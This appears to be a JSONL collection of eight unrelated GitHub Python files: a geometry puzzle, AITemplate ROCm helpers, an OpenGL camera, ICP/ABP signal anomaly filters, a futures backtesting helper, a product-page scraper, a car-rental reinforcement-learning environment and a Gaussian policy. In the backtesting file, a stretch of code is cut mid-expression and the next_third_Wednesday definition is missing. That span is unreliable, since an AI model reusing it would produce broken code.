+{"seq_id":"402199359","text":"# calculate dist between 2 points\ndef getDist(p1, p2):\n return (p2[0] - p1[0])**2 + (p2[1] - p1[1])**2\n\n# permutations of nP2\n\n\ndef getCount(n):\n return n * (n - 1)\n\n# logic is to keep track of number of pairs which has the same distance between them\n# then boomerang count will be nP2 of that pair count\n\n# O(N^2)\n\n\ndef numberOfBoomerangs(points) -> int:\n n = len(points)\n boomCount = 0\n distFreq = dict()\n for i in range(n):\n distFreq.clear()\n for j in range(n):\n if j == i:\n continue\n\n d = getDist(points[i], points[j])\n if d not in distFreq:\n distFreq[d] = 1\n else:\n distFreq[d] += 1\n\n for v in distFreq.values():\n boomCount += getCount(v)\n\n return boomCount\n\n\np = [[0, 0], [1, 0], [-1, 0], [0, 1], [0, -1]]\nprint(numberOfBoomerangs(p))\n","repo_name":"SahilDeb/6Companies30days","sub_path":"Goldman_Sachs_2/BoomerangCount.py","file_name":"BoomerangCount.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"19817992550","text":"import os\nimport pathlib\nimport re\nimport shutil\nimport tempfile\n\nfrom aitemplate.backend import registry\n\n# from . import extra_conv_emit, extra_cutlass_generator, extra_enum\n\n# pylint: disable=C0103,C0415,W0707\n\n\nclass Args:\n def __init__(self, arch):\n self.operations = \"all\"\n self.build_dir = \"\"\n self.curr_build_dir = \"\"\n self.rocm_version = \"5.0.2\"\n self.generator_target = \"\"\n self.architectures = arch\n self.kernels = \"all\"\n self.ignore_kernels = \"\"\n self.kernel_filter_file = None\n self.selected_kernel_list = None\n self.interface_dir = None\n self.filter_by_cc = True\n\n\n@registry.reg(\"rocm.make_ck_lib\")\ndef mk_ck_lib(src_prefix, dst_prefix=None):\n if dst_prefix is None:\n dst_prefix = tempfile.mkdtemp()\n lib_dst = os.path.join(dst_prefix, \"ck_lib\")\n if pathlib.Path(lib_dst).is_dir():\n shutil.rmtree(lib_dst)\n\n os.makedirs(lib_dst)\n with open(os.path.join(lib_dst, \"__init__.py\"), \"w\") as fo:\n fo.write(\"from . import library\\n\")\n fo.write(\"from . import generator\\n\")\n fo.write(\"from . import manifest\\n\")\n fo.write(\"from . import gemm_operation\\n\")\n fo.write(\"from . import conv2d_operation\\n\")\n\n def process_code(src_path, dst_path, code_set):\n pattern = re.compile(r\"from\\s([a-z_0-9]+)\\simport \\*\")\n with open(src_path) as fi:\n lines = fi.readlines()\n output = []\n\n for line in lines:\n match = pattern.match(line)\n if match is not None:\n name = match.groups()[0]\n if name + \".py\" in code_set:\n line = \"from .{name} import *\\n\".format(name=name)\n output.append(line)\n # if \"library.py\" in dst_path:\n # lines = extra_enum.emit_library()\n # output.append(lines)\n # if \"conv2d_operation.py\" in dst_path:\n # lines = extra_conv_emit.emit_library()\n # output.append(lines)\n with open(dst_path, \"w\") as fo:\n fo.writelines(output)\n\n srcs = os.listdir(src_prefix)\n for file in srcs:\n src_path = os.path.join(src_prefix, file)\n if not os.path.isfile(src_path):\n continue\n dst_path = os.path.join(lib_dst, file)\n process_code(src_path, dst_path, srcs)\n\n # extra configs\n # dst_path = os.path.join(lib_dst, \"extra_operation.py\")\n # with open(dst_path, \"w\") as fo:\n # code = extra_ck_generator.emit_library()\n # fo.write(code)\n return dst_prefix\n\n\n@registry.reg(\"rocm.gen_ck_ops\")\ndef gen_ops(arch):\n import ck_lib\n\n args = Args(arch)\n manifest = ck_lib.manifest.Manifest(args)\n try:\n func = getattr(ck_lib.generator, \"Generate\" + arch.upper())\n func(manifest, args.rocm_version)\n except AttributeError as exc:\n raise NotImplementedError(\n \"Arch \" + arch + \" is not supported by current cklib lib.\"\n ) from exc\n return manifest.operations\n","repo_name":"facebookincubator/AITemplate","sub_path":"python/aitemplate/backend/rocm/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","stars":4323,"dataset":"github-code","pt":"53"}
+{"seq_id":"3119979059","text":"from __future__ import division\r\n\r\nfrom math import sin, cos\r\n\r\nfrom OpenGL import GL as gl, GLU as glu\r\n\r\n\r\nclass Camera(object):\r\n\r\n def __init__(self, x=0.0, y=0.0, zoom=10.0):\r\n self.x = x\r\n self.y = y\r\n self.zoom = zoom\r\n self.angle = 0.0\r\n\r\n def world_projection(self, width, height):\r\n '''\r\n Screen's shortest dimension (usually height) will show exactly\r\n self.zoom of the world in each direction from the center of the screen,\r\n regardless of screen resolution\r\n '''\r\n aspect = width / height\r\n\r\n def getOrtho2DBounds():\r\n left = bottom = -self.zoom\r\n right = top = self.zoom\r\n if width > height: # widescreen\r\n left *= aspect\r\n right *= aspect\r\n elif width < height: # tallscreen\r\n bottom /= aspect\r\n top /= aspect\r\n return left, right, bottom, top\r\n\r\n gl.glMatrixMode(gl.GL_PROJECTION)\r\n gl.glLoadIdentity()\r\n glu.gluOrtho2D(*getOrtho2DBounds())\r\n\r\n\r\n def look_at(self):\r\n gl.glMatrixMode(gl.GL_MODELVIEW)\r\n gl.glLoadIdentity()\r\n glu.gluLookAt(\r\n self.x, self.y, +1.0,\r\n self.x, self.y, -1.0,\r\n sin(self.angle), cos(self.angle), 0.0)\r\n\r\n","repo_name":"tartley/pyong","sub_path":"pyong/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"19990370437","text":"from functools import partial\r\nimport multiprocessing\r\nimport os\r\nfrom abc import ABC, abstractmethod\r\nfrom dataclasses import dataclass, field\r\nfrom enum import Enum\r\nfrom math import ceil, floor\r\nfrom pathlib import Path\r\nfrom typing import Callable, Self\r\n\r\nimport numpy as np\r\nimport seaborn as sns\r\nimport wfdb\r\nfrom matplotlib import pyplot as plt\r\nfrom numpy import typing as npt\r\nfrom scipy.signal import cwt, find_peaks, ricker\r\nfrom src.config import AnomalyConfig, load_config\r\n\r\nfrom copy import deepcopy\r\n\r\nPEAK_COLOR = \"r\"\r\n\r\n\r\nclass AnomalyType(str, Enum):\r\n max = \"max\"\r\n min = \"min\"\r\n line = \"line\"\r\n peak_count = \"peaks\"\r\n\r\n def __str__(self) -> str:\r\n return self.value\r\n\r\n\r\nclass SignalType(str, Enum):\r\n icp = \"ICP\"\r\n abp = \"ABP\"\r\n\r\n def __str__(self) -> str:\r\n return self.value\r\n\r\n\r\n@dataclass()\r\nclass Anomaly(ABC):\r\n start: float\r\n end: float\r\n\r\n @abstractmethod\r\n def extend(self, other: Self):\r\n ...\r\n\r\n def overlap(self, other: \"SingleAnomaly | MergedAnomalies\") -> float:\r\n \"\"\"\r\n measuring overlapping area\r\n\r\n Args:\r\n other (Self): other measuret segment\r\n\r\n Returns:\r\n float: overlapped area relative to other\r\n \"\"\"\r\n # if self.end < other.start or other.end < self.start:\r\n # return 0\r\n if self.start < other.start or self.end > other.end:\r\n self,other = other, self # type: ignore\r\n if other.length() == 0:\r\n if self.start <= other.start and self.end >= other.end:\r\n return 1\r\n return 0\r\n if self.end <= other.start or self.start >= other.end : # check if the there is so overlap\r\n return 0\r\n return max((min(self.end,other.end) - max(other.start,self.start)) / other.length(),0)\r\n \r\n def distance(self, other: \"SingleAnomaly | MergedAnomalies\") -> float:\r\n if self.overlap(other) > 0:\r\n return 0\r\n return max(self.start, other.start) - min(self.end, other.end)\r\n\r\n def length(self) -> float:\r\n return max(self.end - self.start, 0) \r\n\r\n\r\n@dataclass\r\nclass SingleAnomaly(Anomaly):\r\n type: AnomalyType\r\n\r\n def extend(self, other: Self) -> None:\r\n if not self.type == other.type:\r\n return\r\n if self.start > other.start:\r\n self.start = other.start\r\n if self.end < other.end:\r\n self.end = other.end\r\n\r\n def convert(self) -> \"MergedAnomalies\":\r\n return MergedAnomalies(self.start, self.end, {self.type : [self]})\r\n\r\n def __str__(self) -> str:\r\n return f\"{self.start}-{self.end}: {str(self.type)}\"\r\n\r\n\r\n@dataclass\r\nclass MergedAnomalies(Anomaly):\r\n type: dict[AnomalyType,list[SingleAnomaly]]\r\n\r\n def extend(self, other: SingleAnomaly| Self):\r\n if self.start > other.start:\r\n self.start = other.start\r\n\r\n if self.end < other.end:\r\n self.end = other.end\r\n\r\n if isinstance(other, SingleAnomaly):\r\n if other.type == AnomalyType.line:\r\n ...\r\n self._extend_anomaly(other)\r\n\r\n else:\r\n for key in other.type:\r\n if key == AnomalyType.line:\r\n ...\r\n anomalies = other.type[key]\r\n for anomaly in anomalies:\r\n self._extend_anomaly(anomaly)\r\n \r\n \r\n\r\n def __str__(self) -> str:\r\n return f\"{self.start}-{self.end}: {', '.join(list(self.type))}\"\r\n \r\n def length(self,type:AnomalyType | None = None) -> float:\r\n if type:\r\n if not self.type.get(type):\r\n return 0.\r\n return sum([anomaly.length() for anomaly in self.type[type]])\r\n return self.end - self.start\r\n \r\n def _extend_anomaly(self,other: SingleAnomaly):\r\n if other.type == AnomalyType.line:\r\n ...\r\n anomalies = self.type.get(other.type)\r\n if not anomalies:\r\n self.type[other.type] = [other]\r\n else:\r\n overlaps = []\r\n distances = []\r\n for anomaly in self.type[other.type]:\r\n overlaps.append(other.overlap(anomaly))\r\n distances.append(other.distance(anomaly))\r\n id = overlaps.index(max(overlaps))\r\n if overlaps[id] == 0:\r\n id_dist = distances.index(min(distances))\r\n if distances[id_dist] <= load_config().distance:\r\n anomalies[id_dist].extend(deepcopy(other))\r\n else:\r\n anomalies.append(deepcopy(other))\r\n else:\r\n anomalies[id].extend(deepcopy(other))\r\n\r\n @classmethod\r\n def join(cls, *arg: SingleAnomaly | Self) -> Self:\r\n start = min([anomaly.start for anomaly in arg])\r\n end = max([anomaly.end for anomaly in arg])\r\n tmp = cls(start,end,{})\r\n\r\n for anomaly in arg:\r\n if isinstance(anomaly,MergedAnomalies):\r\n for key in anomaly.type.keys():\r\n for single_anomaly in anomaly.type[key]:\r\n tmp.extend(single_anomaly)\r\n else:\r\n tmp.extend(anomaly)\r\n\r\n return tmp\r\n\r\n\r\n\r\ndef window_average(values: npt.NDArray, window_size: int) -> tuple[npt.NDArray, float]:\r\n for idx, window in enumerate(np.lib.stride_tricks.sliding_window_view(values, window_size)[window_size:]):\r\n values[window_size + idx] = window.mean()\r\n\r\n peaks = find_peaks(values)\r\n return values, len(peaks)\r\n\r\n\r\ndef find_peaks_filtered(values: npt.NDArray, wavelet_len: float, wavelet: Callable):\r\n filtered = cwt(values, wavelet, [wavelet_len])\r\n return find_peaks(filtered[0])[0]\r\n\r\n\r\n@dataclass\r\nclass Signal:\r\n signal: npt.NDArray\r\n fs: int # sampling frequency of the signal\r\n peaks_per_second: float\r\n path: Path\r\n window_indexes: npt.NDArray = field(init=False)\r\n wavelet: Callable\r\n wavelet_len: float\r\n\r\n @classmethod\r\n def load_signal(\r\n cls,\r\n path: Path,\r\n type: SignalType,\r\n cpu_count: int | None = os.cpu_count(),\r\n wavelet_len: float = 5,\r\n wavelet: Callable = ricker,\r\n ):\r\n \"\"\"\r\n load the signal file into memory\r\n\r\n Args:\r\n path (Path): path to the signal file\r\n type (SignalType): which signal from file load\r\n\r\n Returns:\r\n Signal: signal object with loaded signal\r\n \"\"\"\r\n cpu_count = cpu_count if cpu_count else 1\r\n signals, fields = wfdb.rdsamp(path)\r\n\r\n signal_type = fields[\"sig_name\"].index(type.value)\r\n signal: npt.NDArray = signals[:, signal_type].astype(np.float64)\r\n del signals\r\n\r\n split = np.array_split(signal, cpu_count)\r\n # filtered_signal, peaks = window_average(signal,average_window_size)\r\n\r\n # peaks_per_second = peaks / (len(signal)/fields[\"fs\"])\r\n\r\n peak_finding = partial(find_peaks_filtered, wavelet_len=wavelet_len, wavelet=ricker)\r\n\r\n # preprocess signal in parallel on splitted signal\r\n with multiprocessing.Pool(cpu_count) as pool:\r\n preprocessed_signal = pool.map(peak_finding, split)\r\n\r\n peaks_per_second = np.sum([len(peaks_window) for peaks_window in preprocessed_signal]) / (len(signal) / fields[\"fs\"])\r\n\r\n return cls(\r\n signal=signal,\r\n fs=fields[\"fs\"],\r\n peaks_per_second=peaks_per_second,\r\n path=path,\r\n wavelet=wavelet,\r\n wavelet_len=wavelet_len,\r\n )\r\n\r\n def look(self, start: float, end: float, peaks: bool = True):\r\n \"\"\"\r\n Open graph window with time series of the signal in specified range. Unit are in the seconds\r\n\r\n Args:\r\n start (float): start of the range (in seconds)\r\n end (float): end of the range (in seconds)\r\n peaks (bool, optional): Whether to visualize peaks. Defaults to True.\r\n \"\"\"\r\n _, axes = plt.subplots()\r\n values = self.signal[ceil(start * self.fs) : floor(end * self.fs)]\r\n sns.lineplot(y=values, x=np.arange(start, end, 1 / self.fs), ax=axes)\r\n if peaks:\r\n found_peaks = find_peaks_filtered(values, self.wavelet_len, self.wavelet)\r\n sns.scatterplot(x=(found_peaks / self.fs) + start, y=[values[t] for t in found_peaks], ax=axes, color=PEAK_COLOR)\r\n plt.show(block=True)\r\n\r\n def check(\r\n self,\r\n anomaly: AnomalyType,\r\n th: float,\r\n config: AnomalyConfig,\r\n window_size: float = 5,\r\n stride: float | None = None,\r\n ) -> list[SingleAnomaly]:\r\n anomalies: list[SingleAnomaly] = []\r\n detected = False\r\n index = 0\r\n start = 0\r\n window_size = floor(window_size * self.fs)\r\n stride = floor(stride * self.fs) if stride else 1\r\n self.window_indexes = np.arange(0, window_size, 1)\r\n prev_anomaly: SingleAnomaly | None = None\r\n\r\n for idx, window in enumerate(np.lib.stride_tricks.sliding_window_view(self.signal, window_size)[::stride, :]):\r\n anomaly_index = getattr(self, f\"filter_{anomaly}\")(window, th=th)\r\n if isinstance(anomaly_index,tuple):\r\n if not detected:\r\n start = anomaly_index[0] + idx * stride\r\n detected = True\r\n index =idx * stride + anomaly_index[1]\r\n elif detected:\r\n current_anomaly = SingleAnomaly(start / self.fs, index / self.fs, anomaly)\r\n if prev_anomaly and prev_anomaly.distance(current_anomaly) <= config.distance:\r\n prev_anomaly.extend(current_anomaly)\r\n continue\r\n \r\n anomalies.append(current_anomaly)\r\n prev_anomaly = current_anomaly\r\n detected = False\r\n\r\n if detected:\r\n current_anomaly = SingleAnomaly(start / self.fs, index / self.fs, anomaly)\r\n if prev_anomaly and prev_anomaly.distance(current_anomaly) <= config.distance:\r\n prev_anomaly.extend(current_anomaly)\r\n else:\r\n anomalies.append(current_anomaly)\r\n\r\n\r\n return anomalies\r\n\r\n # === filtering functions===\r\n def filter_max(\r\n self,\r\n window: npt.NDArray,\r\n th: int = 90,\r\n ) -> tuple[int,int]| None:\r\n idx = np.argwhere(window >= th)\r\n if idx.size > 0 :\r\n return idx[0][0], idx[0][-1]\r\n\r\n def filter_min(self, window: npt.NDArray, th: int = -30) -> tuple[int,int] | None:\r\n idx = np.argwhere(window <= th)\r\n if idx.size > 0 :\r\n return idx[0][0], idx[0][-1]\r\n\r\n def filter_line(self, window: npt.NDArray, th: float = 0.03) -> tuple[int,int] | None:\r\n coef = np.polynomial.polynomial.Polynomial.fit(self.window_indexes, window, 1)\r\n if np.sqrt(np.power(coef(window) - window, 2)).mean() < th:\r\n return 0, window.shape[0]\r\n\r\n def filter_peaks(self, window: npt.NDArray, th: float = 0.5) -> tuple[int,int]| None:\r\n peaks = find_peaks_filtered(window, self.wavelet_len, self.wavelet)\r\n seconds = len(window) / self.fs\r\n peaks_per_second = len(peaks) / seconds\r\n\r\n if peaks_per_second > self.peaks_per_second * (1 + th) or peaks_per_second < self.peaks_per_second * (1 - th):\r\n return 0, window.shape[0]\r\n\r\n # ==========================\r\n","repo_name":"daviholy/aso1","sub_path":"src/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":11478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"17043346424","text":"# -*- coding: utf-8 -*-\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 3 11:20:31 2017\n\n@author: Heng\n\"\"\"\n\nimport calendar\nfrom datetime import timedelta\n\n\nimport pandas as pd \nfrom enum import Enum\n\n\ndef toMonthCode(ticker,monthCode):\n tickerCode = list()\n for t in ticker:\n code = monthCode[t]\n tickerCode.append(code)\n\n return tickerCode\n \n \n#def generateTrade(signal_list,mktData,risk_limit,long_bond,short_bond,today):\n# raw_trades = list()\n# #t1 = trade(\"X08\",10,1.25,today)\n# for key in list(signal_list.index):\n# s = signal_list.loc[key]['signal']\n# amount = 10 if s= 15 else d + timedelta(weeks=1)\n \ndef contractDate(d,n):\n Maturity = list()\n \n Exp_thisMonth = calendar.Calendar(2).monthdatescalendar(d.year, d.month)[3][0]\n if Exp_thisMonth >= d:\n Maturity.append(Exp_thisMonth)\n else:\n Maturity.append(next_third_Wednesday(Exp_thisMonth))\n \n for i in range(n-1):\n Maturity.append(next_third_Wednesday(Maturity[i]))\n \n return Maturity\n\ndef expiryCalc(ticker,today):\n dates = contractDate(today,7)\n monthMap = {\"F\":1, \"G\":2, \"H\":3,\"J\":4,\"K\":5, \"M\":6, \"N\":7,\"Q\":8,\"U\":9, \"V\":10, \"X\":11,\"Z\":12}\n code = ticker.split(\"_\") \n month = monthMap[code[1][0]]\n for date in dates:\n if month == date.month : expiry = date - today\n \n return expiry.days\n\n\n\n \ndef contractCode(d,n):\n monthcode = {1:\"F\", 2:\"G\", 3:\"H\",4:\"J\",5:\"K\", 6:\"M\", 7:\"N\",8:\"Q\",9:\"U\", 10:\"V\", 11:\"X\",12:\"Z\"}\n dates = contractDate(d,n)\n code_list = list(map(lambda aday: monthcode[aday.month] + str(aday.year)[2:],dates))\n code = dict()\n contract_list = ['f1','f2','f3','f4','f5','f6','f7']\n for i in range(len(code_list)):\n code[contract_list[i]] = code_list[i]\n\n for i in range(0,len(code_list)-1):\n for j in range(i+1,len(code_list)):\n futName = contract_list[j]+\"_\"+contract_list[i]\n monName = code[contract_list[j]]+\"_\"+code[contract_list[i]]\n code[futName] = monName\n \n return code\n\ndef tradeFilter(tradeList, priority, monthCodeMap):\n priority_code = list()\n\n for ticker in priority:\n priority_code.append(monthCodeMap[ticker])\n priorityMap = dict()\n TopOrder = 100 # this looks stupid, is there a better to get Top priority trade\n TopOrderTrade = None\n for trade in tradeList:\n ticker = trade.ticker\n order = priority_code.index(ticker)\n priorityMap[ticker] = order\n if TopOrder > order:\n TopOrder = order\n TopOrderTrade = trade\n tradeList = list()\n tradeList.append(TopOrderTrade) \n return tradeList\n\n\n\n\n\n \n\n\n\n","repo_name":"project-rubick/master","sub_path":"BackTestingHeader.py","file_name":"BackTestingHeader.py","file_ext":"py","file_size_in_byte":4591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"6218304812","text":"import logging\nimport random\nimport re\nimport sys\nfrom time import sleep\n\nimport requests\n\nlogger = logging.getLogger(__name__)\n\nSECRETS = []\nSECRET_TEXT = 'Sie haben einen Geist gefunden'\nUSER_AGENT = 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:41.0) Gecko/20100101 Firefox/41.0'\n\n\ndef check_article_for_secret(s: requests.Session, pr_link: str, ref_link: str):\n '''\n Checks an article for a secret and stores the article number if it exists\n '''\n\n try:\n r = s.get(\n url=pr_link,\n headers={ 'Referer': ref_link }\n )\n\n except requests.exceptions.RequestException:\n logger.error('[-] Request failed, terminating...', exc_info=True)\n sys.exit(1)\n\n data = r.text\n\n if data.find(SECRET_TEXT) != -1:\n logger.info(f'[+] Found secret at {pr_link}')\n g = re.findall(r'(\\d*)<', data)\n SECRETS.append(g[0])\n\n\ndef get_articles(s: requests.Session, mf_link: str):\n '''\n Finds all products and checks each for a secret\n '''\n\n try:\n r = s.get(\n url=mf_link,\n headers={ 'Referer': 'https://www.mindfactory.de/' }\n )\n\n except requests.exceptions.RequestException:\n logger.error('[-] Request failed, terminating...', exc_info=True)\n sys.exit(1)\n\n articles = re.findall(r'\"(.*)\" class=\"p-complete-link visible-xs visible-sm', r.text)\n\n for article_link in articles:\n check_article_for_secret(s, article_link, mf_link)\n\n\ndef main():\n '''\n finds hidden secrets on mindfactory\n '''\n\n all_links = ['']\n\n sess = requests.Session()\n\n # set user cookies\n sess.cookies.set('NSid', '', domain='.mindfactory.de', path='/')\n sess.cookies.set('lz_userid', '', domain='chat.mindfactory.de', path='/livezilla')\n sess.cookies.set('cookies_accepted', 'true')\n\n # set user agent\n sess.headers.update({'User-Agent': USER_AGENT})\n\n for link in all_links:\n\n if not link.endswith('/article_per_page/5'):\n link = f'{link}/article_per_page/5'\n\n get_articles(sess, link)\n logger.debug('Waiting for next link...')\n sleep(3)\n\n if SECRETS:\n logger.info(f'[+] article numbers: {\",\".join(SECRETS)}')\n else:\n logger.warn('[-] No secrets found?')\n\n return 0\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO,\n format='%(asctime)s - %(levelname)s - %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n filename='spam.log',\n filemode='a'\n )\n c = logging.StreamHandler()\n c.setLevel(logging.INFO)\n f = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\n c.setFormatter(f)\n logger.addHandler(c)\n sys.exit(int(main() or 0))\n","repo_name":"HeleleF/scraper","sub_path":"mfscraper.py","file_name":"mfscraper.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"13883801543","text":"# -*- coding: utf-8 -*-\r\n\r\nimport numpy as np\r\nimport cv2\r\nfrom matplotlib import pyplot as plt\r\n\r\n# 画像をグレースケールで読み込む\r\nimg = cv2.imread('/Users/kiyotakoki/dev/com_vis/07_DFT/sakurajima.jpeg',0)\r\n\r\n# DFT\r\ndft = cv2.dft(np.float32(img),flags = cv2.DFT_COMPLEX_OUTPUT)\r\n# 結果をシフト\r\ndft_shift = np.fft.fftshift(dft)\r\n\r\n# 見易いスケールに変換\r\nmagnitude_spectrum = 20*np.log(cv2.magnitude(dft_shift[:,:,0],dft_shift[:,:,1]))\r\n\r\nplt.subplot(121),plt.imshow(img, cmap = 'gray')\r\nplt.title('Input Image'), plt.xticks([]), plt.yticks([])\r\nplt.subplot(122),plt.imshow(magnitude_spectrum, cmap = 'gray')\r\nplt.title('Magnitude Spectrum'), plt.xticks([]), plt.yticks([])\r\nplt.show()\r\n\r\ncv2.imwrite(\"magnitude_spectrum.png\", magnitude_spectrum)\r\n\r\n","repo_name":"kkiyota63/ImageProcessing","sub_path":"07_DFT/07_sample01.py","file_name":"07_sample01.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"470428478","text":"import numpy as np\nimport sys\nimport math\n\nfrom gym.envs.toy_text import discrete\n\ndef clipped_poisson(lam, max_k):\n \"\"\"\n Return poisson PMF clipped at max_k with remaining tail probability\n placed at max_k.\n \"\"\"\n pmf = np.zeros(max_k + 1)\n for k in range(max_k):\n pmf[k] = math.exp(-lam) * lam**k / math.factorial(k)\n pmf[max_k] = 1 - np.sum(pmf)\n \n return pmf \n\n\nclass JackCarRentalEnv(discrete.DiscreteEnv):\n \"\"\" Example 4.2 from Reinforcement Learning: An Introduction by Sutton and Barto.\n \"\"\"\n\n def build_pmfs(self, lambda_request, lambda_return, max_cars):\n \"\"\"\n Return p(new_rentals, returns | initial_cars) as numpy array:\n p[initial_cars, new_rentals, returns]\n \"\"\"\n pmf = np.zeros((max_cars+1, max_cars+1, max_cars+1))\n\n for init_cars in range(max_cars + 1):\n new_rentals_pmf = clipped_poisson(lambda_request, init_cars)\n for new_rentals in range(init_cars + 1):\n max_returns = max_cars - init_cars + new_rentals\n returns_pmf = clipped_poisson(lambda_return, max_returns)\n for returns in range(max_returns + 1):\n p = returns_pmf[returns] * new_rentals_pmf[new_rentals]\n pmf[init_cars, new_rentals, returns] = p\n \n return pmf\n\n def get_transition_model(self, s, a):\n \"\"\"\n Inputs: state as 2-tuple / action as -2,-1,0,1,2 [-max,max]\n Returns a 2-tuple:\n 1. p(s'| s, a) as dictionary:\n keys = s'\n values = p(s' | s, a)\n 2. E(r | s, a, s') as dictionary:\n keys = s'\n values = E(r | s, a, s')\n \"\"\"\n s = (s[0] - a, s[1] + a) # move a cars from loc1 to loc2 \n s = np.clip(s,0,self.max_cars) # impossible actions are cliped to possible states\n\n move_reward = -math.fabs(a) * 2 # ($2) per car moved\n t_prob, expected_r = ([{}, {}], [{}, {}])\n for loc in range(2):\n morning_cars = s[loc]\n rent_return_pmf = self.rent_return_pmf[loc]\n for rents in range(morning_cars + 1):\n max_returns = self.max_cars - morning_cars + rents\n for returns in range(max_returns + 1):\n p = rent_return_pmf[morning_cars, rents, returns]\n if p < 1e-5:\n continue\n s_prime = morning_cars - rents + returns\n r = rents * 10\n t_prob[loc][s_prime] = t_prob[loc].get(s_prime, 0) + p\n expected_r[loc][s_prime] = expected_r[loc].get(s_prime, 0) + p * r\n \n # join probabilities and expectations from loc1 and loc2\n t_model, r_model = ({}, {})\n for s_prime1 in t_prob[0]:\n for s_prime2 in t_prob[1]:\n p1 = t_prob[0][s_prime1] # p(s' | s, a) for loc1\n p2 = t_prob[1][s_prime2] # p(s' | s, a) for loc2\n t_model[(s_prime1, s_prime2)] = p1 * p2\n # expectation of reward calculated using p(s', r | s, a)\n # need to normalize by p(s' | s, a)\n norm_E1 = expected_r[0][s_prime1] / p1\n norm_E2 = expected_r[1][s_prime2] / p2\n\n norm_E1 = 10*round(norm_E1 / 10)\n norm_E2 = 10*round(norm_E2 / 10)\n\n r_model[(s_prime1, s_prime2)] = norm_E1 + norm_E2 + move_reward\n \n return t_model, r_model\n\n\n\n\n\n def __init__(self, max_cars = 4, rents_per_day = (3,4), returns_per_day = (3,2) ):\n \"\"\" The environment is a DiscreteEnv Gym with the following members:\n - nS: number of states\n - nA: number of actions\n - P: transitions (*)\n - isd: initial state distribution (**)\n (*) dictionary dict of dicts of lists, where\n P[s][a] == [(probability, nextstate, reward, done), ...]\n (**) list or array of length nS\n \"\"\"\n\n self.max_cars = max_cars\n self.max_move_cars = int(max_cars / 4)\n self.grid_shape = (max_cars+1,max_cars+1)\n self.rents_per_day = rents_per_day\n self.returns_per_day = returns_per_day\n\n print(\"Initialized JackCarRental Environment : %d max_cars %d max_moving cars\"%(max_cars,self.max_move_cars))\n\n nS = np.prod(self.grid_shape)\n nA = len(np.arange(-self.max_move_cars, self.max_move_cars + 1))\n\n # pre-build the rentals/returns pmf for each location\n self.rent_return_pmf = [self.build_pmfs(self.rents_per_day[i], self.returns_per_day[i], max_cars) for i in [0,1] ]\n\n P = {}\n for s_index in range(nS):\n s = np.unravel_index(s_index, self.grid_shape)\n P[s_index] = { a : [] for a in range(nA) }\n\n max_a = min(self.max_move_cars, s[0], max_cars-s[1])\n min_a = max(-self.max_move_cars, -s[1], -(max_cars-s[0]))\n \n for a_real in range(min_a, max_a+1):\n a = a_real + self.max_move_cars\n state_real = np.array(s) + np.array([-a_real, a_real])\n\n t_model, r_model = self.get_transition_model(s, a_real)\n for sp in t_model:\n p = t_model[sp]\n r = r_model[sp]\n sp_index = np.ravel_multi_index(sp,self.grid_shape)\n P[s_index][a].append([p, sp_index, r, False])\n\n isd = np.zeros(nS)\n isd[int(nS/2)] = 1.0\n super(JackCarRentalEnv, self).__init__(nS, nA, P, isd)\n\n def render(self):\n print(\"nothing to render\")\n\n\n","repo_name":"santmarti/SDIC-Code","sub_path":"notebooks/environments/jackcar.py","file_name":"jackcar.py","file_ext":"py","file_size_in_byte":5642,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"10131910528","text":"import numpy as np\n\n\nclass LinearGaussianPolicy:\n\n def __init__(self, weights=None, noise=None):\n if weights is not None:\n self.weights = weights\n self.output, self.input = self.weights.shape\n if noise is not None and isinstance(noise, (int, float, complex)):\n noise = np.diag(np.ones(self.output)*noise)\n self.noise = noise\n\n def get_weights(self):\n return self.weights\n\n def set_weights(self, weights, noise=None):\n self.weights = weights\n self.output, self.input = self.weights.shape\n if noise is not None and isinstance(noise, (int, float, complex)):\n noise = np.diag(np.ones(self.output)*noise)\n self.noise = noise\n\n def _add_noise(self):\n noise = np.random.multivariate_normal(np.zeros(self.output), self.noise, 1).T\n return noise\n\n def act(self, X, stochastic=True):\n X = X.reshape(self.input, 1)\n y = np.dot(self.weights, X)\n if self.noise is not None and stochastic:\n y += self._add_noise()\n return y\n\n def step(self, X, stochastic=False):\n return None, self.act(X, stochastic), None, None\n\n def compute_gradients(self, X, y, diag=False):\n X = np.array(X).reshape(self.input, 1)\n y = np.array(y).reshape(self.output, 1)\n mu = np.dot(self.weights, X)\n if diag:\n return np.diag((np.dot(np.linalg.inv(self.noise), np.dot((y - mu), X.T))))\n else:\n return (np.dot(np.linalg.inv(self.noise), np.dot((y - mu), X.T))).flatten()\n","repo_name":"gioramponi/sigma-girl-MIIRL","sub_path":"policies/linear_gaussian_policy.py","file_name":"linear_gaussian_policy.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"}
